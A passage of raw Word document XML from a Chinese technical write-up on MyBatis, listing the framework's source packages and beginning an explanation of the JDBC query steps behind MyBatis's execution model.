          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>包中寻找一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>下满足条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>比如某个接口的子类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的所有类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>反射</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org.apache.ibatis.reflection</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org.apache.ibatis.reflection.factory</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org.apache.ibatis.reflection.invoker</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org.apache.ibatis.reflection.property</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org.apache.ibatis.reflection.wrapper</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可以参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>MetaObjectTest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>来跟踪调试，基本上用到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>reflection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>包下所有的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>数据源</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org.apache.ibatis.datasource</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lastRenderedPageBreak/>
        <w:t>org.apache.ibatis.datasource.jndi</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org.apache.ibatis.datasource.pooled</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org.apache.ibatis.datasource.unpooled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>事务</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org.apache.ibatis.transaction</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org.apache.ibatis.transaction.jdbc</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org.apache.ibatis.transaction.managed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>会话</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org.apache.ibatis.session</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org.apache.ibatis.session.defaults</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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11.jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>单元测试工具</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org.apache.ibatis.jdbc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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12.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>构建</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org.apache.ibatis.builder</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org.apache.ibatis.builder.annotation</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org.apache.ibatis.builder.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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13.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>映射</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org.apache.ibatis.mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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14.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>脚本</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org.apache.ibatis.scripting</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org.apache.ibatis.scripting.defaults</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org.apache.ibatis.scripting.xmltags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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15.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>注解</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org.apache.ibatis.annotations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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16.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>绑定</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org.apache.ibatis.binding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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17.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>执行器</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org.apache.ibatis.executor</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org.apache.ibatis.executor.keygen</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org.apache.ibatis.executor.loader</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org.apache.ibatis.executor.loader.cglib</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org.apache.ibatis.executor.loader.javassist</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org.apache.ibatis.executor.parameter</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org.apache.ibatis.executor.result</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org.apache.ibatis.executor.resultset</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lastRenderedPageBreak/>
        <w:t>org.apache.ibatis.executor.statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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18.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>插件</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org.apache.ibatis.plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00DD6166" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Jdbc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6166">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>演化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查询数据库数据，七个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>驱动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>建立并获取数据库连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDBC Statements</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句的传入参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AE508F" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE508F">
